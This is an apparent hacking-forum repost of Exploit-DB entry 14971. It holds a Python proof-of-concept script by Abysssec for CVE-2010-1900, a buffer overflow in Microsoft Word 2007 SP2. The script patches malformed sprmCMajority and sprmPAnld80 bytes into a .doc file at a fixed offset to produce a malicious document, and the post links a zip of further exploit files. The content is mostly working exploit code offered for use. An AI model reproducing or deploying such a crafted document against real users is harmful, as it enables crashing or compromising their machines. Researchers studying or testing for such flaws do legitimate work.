Exploit Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14971
Проверка EDB
  1. Пройдено
Автор
ABYSSSEC
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2010-1900
Дата публикации
2010-09-11
Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow
Код:
'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip)
'''

'''
  Title               :  Microsoft Office Word sprmCMajority buffer overflow
  Version             :  Word 2007 SP 2
  Analysis           :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-1900

'''

import sys

def main():
   
    try:
		fdR = open('src.doc', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:4082]
		str2 = strTotal[4088:]
		
		sprmCMajority = "\x47\xCA\xFF"    # sprmCMajority  
		sprmPAnld80 = "\x3E\xC6\xFF"    # sprmPAnld80
				
		fdW= open('poc.doc', 'wb+')
		fdW.write(str1)
		fdW.write(sprmCMajority)
		fdW.write(sprmPAnld80)				
		fdW.write(str2)
		
		fdW.close()
		fdR.close()
		print '[-] Word file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()
 
Источник
www.exploit-db.com

Похожие темы